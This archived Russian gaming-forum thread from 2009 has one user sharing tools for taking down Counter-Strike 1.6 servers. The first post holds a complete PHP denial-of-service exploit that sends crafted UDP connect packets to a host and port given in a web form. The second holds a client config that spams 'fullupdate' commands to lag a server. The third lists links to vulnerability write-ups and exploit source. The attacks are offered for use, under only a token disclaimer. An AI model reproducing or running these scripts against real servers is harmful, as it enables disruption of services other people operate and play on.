Расширенный поиск
Для печати Известить друга
Список форумов КорзинаАрхив

Вот чем еба**** ваши сервера.......

Раздел для закрытых и архивных тем.
Правила форума
У Ведра нет правил. Здесь царит Хаос и Анархия.
Тема закрыта

Вот чем еба**** ваши сервера.......

Сообщение ArhangeL » 18 май 2009, 21:18

Вот собственно PHP скрипт,которым можно вьзебать сервер так что тот будет долго в ступаре.....
для его использования нужно.. веб сервер и руки и мозг...
инфа взята в инете......


Код: выделить все
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td>&nbsp;</td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td>&nbsp;</td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>

<?php

/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/

ini_set("display_errors","0");

function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}

function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}

function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}

function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}

function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}

IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>


существует также и версия программы для ддоса серверов.... программа написана на C++ исходники есть в инете.. как и сама программа....
вроде на scurityfiles.com както так вроде..
Аватар пользователя
ArhangeL
 
Автор темы
Вернуться наверх

А вот чем вешают сервер(лагами...)

Сообщение ArhangeL » 18 май 2009, 22:12

Код: выделить все
bind mouse1 "+attack"
bind F1 "m4a1;ak47;buyammo1;vest;buyammo1;vesthelm"
bind F2 "hegren;flash;flash"
bind space "+jump"
alias +aj "alias tog2 ajf;alias sp1;alias _special af;af" ///
alias -aj "alias tog2;sp2;alias sp1 sp0;-ssay" ///
alias ajf+ "+ssay;alias ajf ajf-" ///
alias ajf- "-ssay;alias ajf ajf+" ///
alias ajf "ajf+" ///
alias sp1 "sp0" ///
alias sp2 "sp0" ///
alias sp0 "alias _special" ///
alias af "tog1;tog2;wait;special" ///
alias tog1 ///
alias tog2 ///
alias +ssay "fullupdate;fullupdate;fullupdate;fullupdate;
fllupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;"
alias - ssay"fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;fullupdate;
fullupdate;fullupdate;fullupdate;fullupdate;"


alias 1Toggle.jbrv "1Toggle.2.jbrv"
alias 1Toggle.2.jbrv "alias 1Toggle.jbrv 1Toggle.3.jbrv;+aj;speak on;"
alias 1Toggle.3.jbrv "alias 1Toggle.jbrv 1Toggle.2.jbrv;-aj;speak of;"
bind "f" "1Toggle.jbrv"

speak doop.activated

bind space "+jump"


Вот таким вот вреденосным скриптом можно поднять пинг сервера на 200 а то и большее.. представьте что будет если зйдет 4 игрока....

Вся размещаемая информация здесь.... Используется в целях ознакомления. Я надеюсь вы не будете применять это конфиг для своих черных нужд......
Аватар пользователя
ArhangeL
 
Автор темы
Вернуться наверх

Вот 5 дырок в кс 1.6....

Сообщение ArhangeL » 18 май 2009, 22:34

http://securityvulns.ru:80/docs4416.html

http://securityvulns.ru:80/docs4915.html

http://securityvulns.ru:80/docs4914.html

http://securityvulns.ru:80/files/pu-hl.c

http://securityvulns.ru:80/docs4913.html

те кто умеет програмировать на C/C++ найдут как это использовать.....
Аватар пользователя
ArhangeL
 
Автор темы
Вернуться наверх
Тема закрыта

Вернуться в Архив

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 3

Наша командаУдалить cookies форумаЧасовой пояс: UTC + 3 часа
Список форумов